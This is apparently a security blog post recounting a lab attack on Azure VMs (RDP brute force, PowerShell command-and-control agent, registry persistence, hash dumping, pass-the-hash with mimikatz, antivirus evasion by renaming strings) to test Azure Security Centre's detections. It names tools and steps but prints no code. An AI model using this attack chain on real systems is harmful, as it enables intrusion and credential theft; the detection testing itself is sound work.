Microsoft Azure cloud computing services for deploying managing application and service through ta global network of Microsoft managed data centres. T provide software as a service , platform as service and infrastructure as service with large number of services , tools and framework including both Microsoft specific and third party software systems .
But really why should you move to cloud? Well next couple of paragraph explains,
After my introduction to Azure cloud implementing azure infrastructure solution decided to look at the one of the core Azure cloud service Azure Security centre Prevent, detect and to threats with increased visibility and control over resource groups , essentially Virtual machines, NSG Network security groups, network anomalies e.g. external/network attacks especially windows attack vector.
What did I really found.. Next step is to test the underlying Security operation centre security identify how it respond to determined sophisticated PowerShell based on memory/disk attack ,
We created a resource group under the name of securesystem.co.uk and deployed a windows server 2012 R2 with domain active directory installed and a SQL Server 2016 as joined server to the domain.
The new ARM template when deploy a VM by default doesn’t allow any incoming connection, in another word port 3389 Remote Desktop Protocol is not allowed. We created a new NSG Network security group and allowed port 3389 for remote management. Of course you should never allow direct access to RDP over the public network but still very common very mistake administrator make.
Next we enabled Security centre and added a policy to monitor our resource group containing the Domain controller active directory and domain joined SQL Server 2016. Now that we have configured virtual machines and security centre monitoring.. You probably figured out our next step… The attack
In this scenario I use the following attacks and tools,
- RDP Remote Protocol attack using a dictionary attack with most common used passwords
- – Custom designed PowerShell/Python command and control framework
- – Persistence and lateral movement using pass the hash attack
- – Forensic network analysis and anomaly detection
On our kail attacking host we used medusa with dictionary file containing the password attacked the 18.104.22.168 which is the SRV01 domain controller listening on port 3389. Of course for sake of demonstration we added the correct password to the list as highlighted the password found “ReallySecure$$” Success .
Figure 1 Medusa conducted controlled dictionary attack from Kali Linux attacking machine
Next we logged on to the SRV01 using Rdesktop from kali machine using the credentials we found in previous initial RDP attack
Figure 2 RDP session with the target SRV01 domain controller server
Custom powershell agent created and base64 encoded to copy over the target machine in order to maintain a persistence on target machine and ensure the agent payload lives in memory only after self-destruct.
Figure 3 powershell agent runs and on target machine and self-destruct itself and lives in memory
Custom Namlook framework python/powershell command control uses public key infrastructure for command and control so the idea is to encrypt the traffic between the target victim machine and my attacking command and control machine
Figure 4 we have connection back from the target azure SRV01 to our python powershell command and control the payload. The payload as you see it spawn the powershell on PID 3632 and we also have internal IP address, machine name, user logged on, ad the last seen is based on 5 second interval to check if the server still sending the heartbeats .
Next step we decided to deploy a persistence stager to our target machine the idea is to force the target SRV01 server to send cmd.exe shell back to our command control every day at 8:00am or simply at startup. So whenever a use logins we get nice shell back from the SRV01
Figure 5 Stager but with high detection ratio as this would touch the disk and lives in HKLM:\Software\Microsoft\Network\debug registry . we encode the payload to be base64
The agent now lives inside registry debug file whenever the user logins to the SRV01 server the persistence module trigger happens and sends encrypted shell back to the command control
Figure 6 debug embedded with base64 encoded powershell agent.
Next step we decided to conduct situational awareness to check what other host is reachable within from compromised target, this module simply uses nmap network mapper to identify hosts and the port numbers
Figure 7 SQLSRV01 10.0.0.4 identified with the open ports 445 SMB , 3389 ?
Next we used another module to extract password hashes directly from SYSTEM/SAM file. System file is required as it contains the windows secret bootkey to extract the password hashes from SAM file
Figure 8 USER Private and RID 500 indicates the user is local administrator account and user Guest RID 501 is guest but disabled by default.
Another fantastic we used is the mimikatz by benjamin DEPLY a.k.a gentilkiwi written in C but ported to powershell to make the use of extracted password hashes and use that as way gaining access to the connecting SQLSRV2 host with the PTH Pass the hash attack, which essentially is to inject the NTLMv2 hash into the process PID 1240 and call the cmd.exe on target server.
Figure 9 now is just a matter of running another PS module to steal the token to give us full administrative access on target SQLSRV02 box.
One last demo was to check how security centre identify malicious executables land on the disk with up to date AV. Of course it’s simple to bypass AV. As you see I recompiled the mimikatz simply by replacing all mimimkatz strings in code with Kikitaz to bypass Anti-virus..
Figure 10 extracted password hashes from SRV01 Server 2012 KIKTAZZZ
Azure Security centre and on disk analysis
process explore is one of the top windows system internal tool we use for security/troubleshooting investigations , it lists all the process and one can easily identify malicious process, schedule tasks, TCP/IP connections and most importantly file signature and many more ..
Process explore identified the PID 3632 Powershell v.1.0 and command line containing the agent PowerShell code runs under the user private context. Base64 encoded code to send the shell back to the command and control.
Figure 10 Process explore identifies the PowerShell malicious code
Closer dynamic analysis we can see winhttp.dll dynamic link library establishes makes 5 minutes interval to our command and control
Figure 11 winhttp.dll used for establishing the C2 connection
Azure security centre main dashboard resource security health with recommendations on vulnerabilities such as open NSG network security groups, Patching as well as container encryption
Figure 12 azure security centre
Azure Security Centre Security Alert with description of each suspicious activities and severity level
Figure 13 dates and individual attack type with severity level Medium to High
Closer analysis shows our dictionary attack from my attacking machine 22.214.171.124 against SRV01 Server 2012 has been identified as network anomaly, good indication of brute force attack
Figure 14 RDP network anomaly brute force detection
Powershell agent identified as malicious with decoded script showing the command and control IP address
Figure 15 Agent identified as malicious powershell
In conclusion it’s clear how Microsoft raised security bar against the sophisticated attacks especially identifying network anomaly and memory based attacks as we demonstrated using PowerShell as command and control. As these types of attacks on premises difficult to identify almost impossible but with Azure the response time is almost 2 ~ 3 hours
The future is here, so time to accept and adopt to cloud services 🙂
Hit me up for security related projects or 5 minutes of CLI ? 🙂
—–BEGIN PGP PUBLIC KEY BLOCK—–
Version: GnuPG v2.0.22 (GNU/Linux)
—–END PGP PUBLIC KEY BLOCK—–